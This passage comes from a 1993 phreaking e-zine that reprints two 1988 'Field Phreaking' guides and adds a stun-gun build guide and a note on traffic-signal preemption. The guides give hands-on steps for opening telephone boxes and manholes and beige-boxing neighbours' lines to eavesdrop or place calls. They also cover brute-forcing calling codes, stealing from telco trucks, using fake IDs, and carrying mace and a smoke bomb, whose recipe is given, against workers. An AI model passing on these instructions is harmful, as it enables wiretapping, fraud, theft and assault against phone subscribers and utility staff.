been red boxing for quite a while now and have never had any problems nor  
have any of my receiving parties ever been harrassed by the Gestapo.  If you 
don't have the plans, call your local P/H BBS or contact somebody in TNO or 
leave me mail on Flatline. 
__________________________________________________________________________ 
(C)opywrong 1993, DeadKat Inc. 
All wrongs denied. 
 
 
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo> 
                                
 
 
(Editor's note:  The following two file are the best files I have ever read                                
 on field phreaking.  They were written by Denver Hacker's a few years ago. 
 Since they were not widely distributed I have included them here for your 
 information.  Unfortunately we were not able to contact the original authors 
 to get permission to reprint them.  As far as we know, The Third Cartel is 
 defunct.  If any previous members of the group read this publication, we 
 ask that they get in contact with us at Flatline.) 
                                
 
                               -/\-/*\-/\-/*\-/\- 
                                The Third Cartel 
                               -\/-\*/-\/-\*/-\/- 
  
                                   Presents: 
   
                               Field Phreaking I 
                              -=-=-=-=-=-=-=-=-=- 
                                  June,  1988 
  
Introduction:  The purpose of this manuscript is to introduce useful phreaking 
-------------  techniques.  These techniques have been developed by the Third 
Cartel and have proved to be convenient and reliable.   
  
Field Phreaking Kit:   
==================== 
  
The Field Phreaking Kit is a neccessity for the serious phreaker.  Some  
so-called phreaks get all of their information including codes from BBSs and 
have an ego big enough to call themselves phreaks.  The real phreak acquires 
knowledge on his own through perseverence and ingenuity.  Following is a list  
of useful items for your Phreaking Kit: 
  
o  Backpack:  Get one:  Very Handy.  We'll tell you how to get one or make one. 
o  Ratchet Set:  Usually, you'll only need 7/16 and 3/8" size ratchets. 
o  Screwdrivers:  Get medium and large screwdrivers, and a phillips head. 
o  Wire Cutters:  Just in case you want to wipe out some lines. 
o  Pliers:  For misc. stuff. 
o  Xacto or Pocket Knife:  To strip or cut wires. 
o  Penlight:  Nice and small; very useful for night work. 
o  Flashlight:  If you need lots of light and have enough room in your pack. 
o  Gloves:  Make sure you don't get shocked or leave your fingerprints around. 
o  Pencil and Paper:  Write down locations, notes, numbers, etc. 
 
------------------------------------------------------------------------------ 
 The Third Cartel carries the following optional materials in their Field Kit: 
------------------------------------------------------------------------------- 
o  Walki-Talkies:  For communications when yelling isn't possible or smart. 
o  Battery Operated Camara Flash:  Good for flashing in someone's eyes at night 
                                   Will blind a telco guy for a few seconds. 
o  Mace/Dog Repellant:  Spray in someone's eyes if they give you trouble. 
o  Smoke Bomb:  Helpful to divert attention or scare. [drop in telco car] 
                [Mix 3 parts potassium nitrate with 2 parts sugar and melt] 
o  Matches:  For smoke bomb or anything that is flammable. 
o  Bandana/Surgical Mask:  Manholes are dusty; Wear these for easier breathing. 
o  Marker:  Mark your "territory" on phone boxes. 
o  Fake Telco ID Card:  Will make some people think that you work for telco. 
  
Organize your kit so you know where everything is and can get something quickly 
when needed.  You don't want to be fumbling for your mace when the gestapo is  
about to get you. 
  
Test Phone: 
=========== 
  
The Test Phone is the most useful piece of equipment for Field Phreaking.  You  
can try to sneak into a telco Plant Department [truckyard] and get a real test  
phone out of a truck like we did.  If you'd rather not do this, don't worry;  
making your own test phone is ultra-easy. 
  
First, get a telephone for your own purposes.  Find the wire coming out of the 
phone that is supposed to go to the wall's modular jack.  It should be at least 
three feet long for convienience.  Cut off the modular jack at the end of the  
wire.  Strip the wire, and there should be two or four small  wires inside.   
Hook the two middle wires to alligator clips [preferably insulated]. You now  
have a test phone!  Very easy, indeed.  Now let's see if you hooked everything  
up ok.  First find your phone box.  It'll probably be on the outside of your  
house.  It's farly small, and you might need the ratchet to open it up.  Once  
you get it open, you should see some screws.  These are the terminals for your  
phone line.  Hook the alligator clips to the two top terminals.  If your phone  
is ok, you should get a dial tone.  Once you know that your phone is working,  
a whole new world opens up to you!  You can hook the phone up to your  
neighbor's terminal and call long distance or yell at the operator on their  
line.  Be careful, though.  You don't want to be talking to Sue in L.A. when  
your neighbors are home and awake.  If they pick up the phone when you're  
already on, you could get into serious trouble.  Of course, you could always  
listen in on them!  If you want, you can hook wires up to your neighbor's  
terminal and lead them to your house.  In case you didn't know, this is called  
Beige Boxing.  You can then hack computers on their line, call Dial-A-Prayer,  
etc.  Make sure to hide the wire well so that it won't be traced to your  
house! 
  
Manholes: 
========= 
  
One way to get access to an abundance of phone lines is by getting into telco  
manholes.  You don't want to accidentally get in a sewer manhole, so the first  
thing to do is find the differences between sewer and telephone manholes.  If  
you have trouble with this, here's a few tips that might help: 
o  Telco manhole covers are usually larger and heavier than other covers. 
o  Telco manholes are scarce compared to sewer manholes.  So if there are 
   a lot of checkered manhole covers in your area, those are probably sewer  
   manholes.  If there are only a handful of unmarked manhole covers in 
   your area, those probably contain phone lines. 
o  Go to your local telco Central Office [CO] and find out what the manhole  
   covers look like there.  Find manhole covers that look the same in other 
   areas, and pick a convenient/safe manhole to explore.    
  
Getting into a manhole is a different story.  Here in the Denver area, it takes 
at least three people to get a manhole cover off.  Hopefully it'll be easier 
to do in your area.  To open the manhole, you'll probably need at least two 
crowbars [You could try using a pickaxe].  Get a group together to open the  
manhole, using 2 or more people with crowbars to slide the cover off.  You  
might want to get a strong guy to push the manhole cover while the other people  
with crowbars support it.  If you know of a tool that was made specifically 
for opening manholes, we'd appreciate it if you contacted us on some local  
Denver boards and told us about it.  Likewise, if you have a better system for  
opening manholes, we'd be grateful for the information. 
  
Once you get the manhole cover off, shine a flahlight down to see if there's  
a ladder going to the bottom.  Try a different manhole if there's no ladder.   
If you want to go down a manhole, don't forget to wear a bandana or surgical  
mask over your mouth so that you don't choke on dust.  Also bring a flashlight  
so you can see what you're doing.  Many times, there'll be a few inches of  
water at the bottom, so you might also want to wear boots. 
  
Down in the manhole, you might find some equipment or manuals.  Go ahead and 
take them if you want; you deserve it!  There should be some very large ABS.   
The phone lines are inside these tubes.  Attached to this tubing there will  
be some short, wide plastic cylinders.  There'll be screws holding these  
cylinders on to the tubing.  You'll need either a screwdriver or a ratchet  
to open a cylinder.  If you happen to get a cylinder open, congratulations!   
You now have access to countless phone lines!  We'll leave it to you to  
figure out what to do with all of those wires.  Surely you'll figure  
something out!  [snip, snip!] 
  
Exploring Telco Building Sites: 
=============================== 
  
One of the best ways to get information about telco is by going to a Central 
Office near you, exploring the trucks in a Plant Department, or "visiting" 
other telco buildings.  The phone company is careless in many ways.  They  
leave important, yet unshredded documents and computer printouts in their 
open dumpsters.  Their cars, vans, and repair vehicles are almost always left  
unlocked.  Inside their vehicles one can usually find manuals, test phones, 
computer cards [usually for mainframes, almost never for personal comuters],  
nice tool sets, etc.!  It's almost as if they *want* to be ripped off!  They  
deserve bad treatment just for their negligence.  If possible, we like to be  
courteous to individual employees of telco.  Most employees are fairly amiable  
and don't deserve trouble.  It's the beuracracy of telco that deserves to be  
manhandled.  Cheap practices such as monopolizing and the overpricing of  
services is the general reason why we phreaks do what we do with such  
determination.  On with the show. 
  
Exploring Dumpters:  Looking inside telco dumpters is probably the easiest way  
to acquire useful information.  Typycally, dumpters will be found outside a 
Central Office. 
                                 
                                
                                
                               -/\-/*\-/\-/*\-/\- 
                                The Third Cartel 
                               -\/-\*/-\/-\*/-\/- 
  
                                   Presents: 
                                
                              Field Phreaking II 
                              -=-=-=-=-=-=-=-=-=- 
                                  July,  1988 
  
Introduction:  The purpose of this manuscript techniques have been developed  
by the Third Cartel and have proved to be convenient and reliable.  This  
manuscript is a continuation of Manuscript II: Field Phreaking. 
  
Pay Phone Hacking: 
================== 
  
The safest way to get phreaking codes is by hacking them on a pay phone.  The 
chances of getting caught are extremely remote, especially if you switch pay 
phones every few minutes.  One problem with hacking codes is that when you find 
a code by dialing it randomly, you often forget what code you dialed.  To 
prevent this, we print out a sheet filled with 6-8 digit random codes on the 
computer.  Then we start testing each of these codes off of a 950 number.  This 
works great, especially since 950s are not charged!  Cross off each code on the 
paper that doesn't work, and mark the ones that do work.  This technique takes 
a lot of patience, but it's worth it if you have a terrible short-term memory. 
  
Telco Boxes: 
============ 
  
This is our prime focus in Manuscript III.  Every field phreaker worth his 
weight in dung should at least know the basics about phone boxes.  There are so 
many different types that we can only cover the major groups.  But once you 
learn about a few boxes, it'll be easy to learn about others.  Be sure to 
bring a test phone with you [see Manuscript II] so you can connect up to phone 
lines. 
  
Small Boxes:  Small telephone boxes typically contain 1 to 20 different phone 
------------  lines.  They are usually in convenient and safe locations.  They 
are easy to open, and can be closed quickly. 
  
Home Boxes:  Unless you live in an apartment complex, your home box shoud be 
very easy to locate.  It is small box located on the side of your house; 
usually a foot or two of the ground.  Many times it will be beige colored 
and may require a ratchet [Usually 3/8"] to open.  If you have more than one 
line in your house, your box will probably be fairly large and light gray. 
You'll need a ratchet and a screwdriver to open a two-line box.  In the 
one-line box there will be five terminals or screws.  The top two screws should 
have red and green wires leading to them.  If you connect your test phone clips 
to these screws, you'll be on the line.  Usually, the two screws below contain 
the same phone line.  The very bottom screw, in the middle, is the ground.  In 
the two-line boxes, you should be able to figure out how to hook up to the 
lines rather easily.  They even have a modular plug jack that you can plug a 
normal phone into.  There are also several terminals that you can hook the 
clips up to. 
  
Aluminum Multi-Line Boxes:  These boxes are usually found behind business 
buildings and shopping centers.  Some condominium complexes also have these 
boxes hooked up to walls on a few units.  Each box contains five or more phone 
lines.  The boxes are rectangular and made of aluminum, are very easy to open 
and close, and often say "Western Electric" on the front.  Once you get the box 
open, you will see several pairs of terminals grouped diagonally.  Simply 
attach your phone clips to a correct pair, and you'll be on a phone line.  Run 
an ANI on the phone line to find its number.  If your phone happens to be 
polarity sensitive, and you get no dial tone when hooked up to terminals, 
reverse the alligator clips and you'll be on the line. 
  
Small Distribution Boxes:  These boxes, usually either light green, or a very 
dark green, are not very common, and can be found behind shopping centers, 
houses, and other buildings.  You'll probably need the ratchet to open it, 
and a knife to strip some wires.  The top of the box pulls off if you loosen 
the screws enough.  Inside, there will be several wires.  Two different sizes 
of wires are found in distribution boxes.  The larger wires lead to nearby 
buildings.  The smaller wires lead to another distribution box where they are 
spliced yn.  These boxes take the most time to use because they have no  
terminals and you have to find the correct wire pairs.  It's easiest to find  
the large wire pairs, so start out with those.  Once you find a phone line,  
you might want to tape together or label the wire pair for future reference.   
Use the same procedure for the smaller wires.  If you find a good box, and  
are willing to take the time, these boxes can be very worthwhile! 
  
Medium Boxes:  Medium boxes carry more lines than small boxes but are usually 
-------------  found in somewhat risky locations.  Most of them require a 
ratchet for access, and they usually open on a hinged door. 
  
Medium Distribution Boxes:  These are identical to the small distribution 
boxes, but carry far more phone lines.  Many times, after taking off the cover, 
there will be a flat access plate you can open with a ratchet.  Use the same 
procedure for this box as outlined in the small distribution box description. 
  
Flat Peg Boxes:  Flat Peg boxes are frequently found behind grocery stores, 
shopettes, and other businesses.  Sometimes they can be found in an office 
phone room or in the back halls of shopping malls.  They are typically big, 
square boxes mounted to a wall and are opened by a handle on a hinged door. 
Sometimes, they are mounted away from a building.  We've seen some that are 
double sided and require a ratchet to open.  Inside, the terminals will be 
grouped in approx. 10 X 3 inch columns.  The terminals are long flat pegs. 
There are four terminals per row.  It is sometimes difficult to hook up to a 
line since the terminals are so close together, but you'll get the hang of 
it after a few tries. 
  
Large Boxes:  These boxes sometimes contain hundreds of phone lines.  They are 
------------  found along busy streets and in business areas or apartment 
complexes.  You'll need a ratchet to open one. 
  
Wire Box:  The wire box is about three feet tall and has two doors opened by 
one latch.  The wires lead into long, plastic, rectangular grouping stations. 
There should be a tool attached by two screws to the side of a door.  Connect 
your phone clips to these screws.  Now connect the tool to a plastic grouping 
station.  If you connect the tool correctly, you will be on a line.   
The bes contained in a single grouping station. 
  
Terminal Boxes:  In our opinion, the terminal box is the king of boxes.  A 
single box may contain up to eight hundred lines.  You can't miss these boxes 
because of their size.  They stand at least four feet tall and have the 
characteristic light green color of most boxes.  After opening a box, you will 
see many red and white numbered terminals pairs on each side.  On the inside of 
each door, there are two screws to connect your test phone to.  Leading out 
from the screws is a double current alligator clip that can easily connect to 
any pair of terminals.  This easy connection tool makes this the most 
convenient box to use, and the most profitable. 
  
Helpful Tips:  Now that you know how most major boxes work, you'll be able to 
-------------  figure out how other boxes work.  By now we're sure you have 
thought of some interesting things to do with boxes.  Here are some tips you 
might find helpful. 
  
The Perfect Box:  The most tedious step in field phreaking is finding "The 
Perfect Box."  This box should be located away from streets and hidden from the 
view of homes.  When working on this box, there should be no worry of being 
caught or observed.  Finding this box might take quite a while, but don't give 
up hope; it's well worth the time and effort.  Try looking around waterways 
such as creeks, lakes, and ditches.  If you have easy access to wilderness 
areas, such as the mountains, try looking for Perfect Boxes around there. 
  
Beige Boxing:  We're not sure exactly who invented the beige box, but it can be 
extremely useful for surveillance and blackmail purposes.  The only materials 
you need for a beige box are two wires and your test phone.  Connect the wires 
to the ring and tip of the line you want to tap.  Make sure your wires are 
hidden, and lead them to your house or other location.  You then can connect 
your phone to the wires and listen in on conversations or use their phone line 
however you want.  Make sure that you don't use a boxed line when the victim 
is likely to pick up his phone and hear you. 
  
Safety Tips: 
  
o  Well, first of all, be extremely careful when choosing a box to work on. 
   Two of us got arrested for using the wrong box at the wrong time.  Make 
   sure that nobody will see you when you're working on it, because you're 
   putting your record at risk.  Of course, if you're under 18, you don't have 
   to worry quite as much, but going to court is not K-Rad. 
  
o  Try wearing gloves when working on phone lines.  You don't want to get 
   shocked or leave fingerprints around. 
  
o  If you ever open a box that has huge cables in it, it's probably a power 
   box.  The power box is usually dark green and stands a few feet in height. 
   Don't even think of messing with one unless you want to risk having a 
   painful death.  If you absolutely *must* disconnect someone's power, then 
   use *EXTREME* caution when disconnecting the cable.  Wear heavy duty gloves, 
   make sure that you aren't wet, and don't use metal tools. 
  
o  Always look for your boxes at day, and work on them at night. 
  
o  Have a getaway bike or car ready in case of an emergency. 
  
o  If anyone catches you, act cool and calm.  You don't want to say "uh, well, 
   umm...well I was just uh...," because that makes you look suspicious. 
   *Always* have a story ready *before* you start opening boxes!  This has 
   saved us a couple of times. 
  
o  You might want to incorporate your fake I.D. card into the scheme so people 
   think that you work for the phone company.  Remember, this won't work on 
   telco employees.  Only attempt to fool average citizens.  If they call the 
   cops or telco, take off. 
  
   This concludes Manuscript III.  We described most of the major phone boxes 
so that you'll be able to figure out how other boxes work.   
 
 
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo> 
 
 
 
                        -=How to make a ZaPPeR GuN=- 
                        -=By Panther Modern TNO/TBF=- 
 
 
  The zapper gun is kinda like a commercial stun gun.  It is not as  
powerful, and is mainly used to piss people off, not to put them down. 
It will scorch skin very painfully, if applied.  Total cost for it is 
around $20-$25, and it is a fun thing to make if yer kinda bored. 
  If you don't know what a capaciter is, read no further, go find out 
what one is/what one looks like, then come back.  Anyway, materials 
are: 
 
-------------------------------------------------------------------- 
Qty           Description                        Approx price 
-------------------------------------------------------------------- 
01       Disposable Fugi-Film FLASH camera        $15+TaX 
01       Small-Mid radio shack projekt BoX        $2-$3 or so.. 
02       Dry wall nails                           10-20 cents 
01       Radio Shack SPST Push Button             $1.50 
01       1 Alkeline AA battery                    $0.50 
-------------------------------------------------------------------- 
           This is to make a fairly nice version. 
           For the raw, crappy version, all you 
           need is the camera.  I won't even go 
           into details on making it, you can  
           figure it out for yerself. 
-------------------------------------------------------------------- 
 
  Okay.  Get the camera.  If you want, take some pictures.  ALL OF THEM,  
or none of them.  Cause if you don't take all, you'll ruin the film.. 
Now, when yer ready, first, rip off the cardboard.  You'll have a plastic 
box.  Open it up, as well as you can.  Be very careful not to damage the 
circuit board, wires, flash, etc.  Once it's open, discard the plastic 
case, and the film.  Now, looking at the circuit board, one can see 
a fairly empty space.  Rite in the middle of it, will be 2 small copper 
"plates."  Soldier your button to this place.  YOu may also remove the 
flash at this time, as it will be shortly rendered useless.  Also, you will 
notice two protrusions of copper strip.  Pull 'em off, and MAKE SURE they  
aren't touching when you finish, cause it will ruin the gun.  Next, put  
the circuit board in the project box.  Drill one hole so you can see the  
LED.  THis will tell you when the gun is ready to FIRE!  (When the LED  
flashes).  Next, line up approx where you want your two tips.  Line up  
the capaciter with this.  Drill holes.  Next, drill one last hole where 
you want the button.  Now, remove the generic AA battery in the camera,  
replace it with your hi-quality Alkeline AA battery.  Now, stick the nails 
in, and soldier them via wires to the two capaciter leads.  Seal them in 
place with either expoxy or hot glue.  Now, wire up your button, and stik 
the LED in the hole you made for it.  CLose up the box.  Your gun is made.. 
Just push the button, holding down for apporx 2 seconds until the lite  
flashs, and touch whatever you want to SHOCK.  This gun is semi-lame, but 
is also fun, and good for boredom..Have PhUn!! 
 
 
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo> 
 
 
             
 
                          Comments on Phrack 42 
                               by Karb0n 
                                -=TNO=- 
 
 
Ok...I was reading a little of Phrack 42...in the first part of the issue I  
read this short post on turning traffic lights to green on your side.... 
I'm here to tell that fucker that you cannot do that anymore... Maybe where 
he lives you can...but not in Colorado.....he must have had an old system. 
Now i'm sure there are a few old lights around 303 that can still be used that 
way but...the metro are is not possible....i'll explain: 
 
There are three different ways to change a stoplight in your direction to  
green. 
 
1) Manually Activated Devices: 
Traffic conroll devices of this type operate by a switch that is manually held 
until a Fire Engine or Ambulace clears the intersection. This switch can be  
set up on an automatic timer that iterrupts traffic flow until the apparatus 
responds, thens turns the light cycle back to normal. 
 
2) Siren Activated Devices: 
The siren of the Apparatus or Police Unit activates this traffic controll  
device. A sound pick-up unit is located at each MAJOR intersection. This unit 
filters out all other noise except the siren and sends a signal to the traffic 
light selector in the control box. The traffic light selector holds the  
yellow light for a few seconds (to let cross-traffic pass through) and then 
switches to red..which flashes at double the normal rate. 
 
Alot of people think  there car horn will set some of these off....no! Not  
true! 
 
3) Light Activated Devices: (This is the one that d00d talked about in Phrack) 
This type of traffic controll device is activated by a Pulseating, High- 
Intensity Stobe light that sends a signal to a detector located at each major  
intersection. This dector holds the light green...if it happends to be green 
when your going through it, or speeds up the normal cycle to green in the  
direction of travel...(note: This means there is a RED light on three sides  
and GREEN only on yours). There is an indicating light located next to the 
light detector, assuring the driver that the traffic signal is in controll 
by the stobe light. 
 
Ok...The name of the stobe light system is called an OPTICOM. The key word in 
the upper paragraph was "HIGH-INTENSITY"...normal car do not have high  
intensity lights...even when you put your brights on. The OPTICOM flashes at 
over 14 times a second...it almost looks like a regular solid light..but nope. 
If you guys don't know what i'm talking about...next time you see a Fire Truck 
running with lights and siren...look at the top of the engine and you'll see  
it flashing away...actually..I think it's the most noticable thing.... 
 
Note: Police cars do not have these on them....and only some Ambulances. 
The reason Cops don't have them is because they have a car that is easier to 
manuver through other cars and intersections. But a fire enigine..with alot 
of water and very heavy can't turn on a dime...you'll be screwed in a second! 
So thats why Fire trucks have them and cops don't. SOme ambulances do...so 
keep an EYE out for it.  
 
 
                                        Karb0n -=TNO=- 
 
   Greets- 
 
                Cavalier: Have you come up for air yet? 
                Dead Kat: Was I abducted? 
         Nuklear Phusion: Dude... the Delphi died. 
            
 
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo> 
 
 
CONCLUSION 
~~~~~~~~~~ 
     Well, thats it for our first issue.  The next ones should be a bit longer 
and probably more technical.  We hope that you found this publication both 
useful and interesting.  If you have the urge to write a text file, please  
contact us at Flatline.  The number is posted on many BBS's and many quality 
hackers have the number too.  If you have any comments about this file, please 
let us know.  We are more than open to suggestions on how to improve this  
'zine and would appreciate feedback.  Look for issue number 2 on a quality 
BBS near you! 
 
 
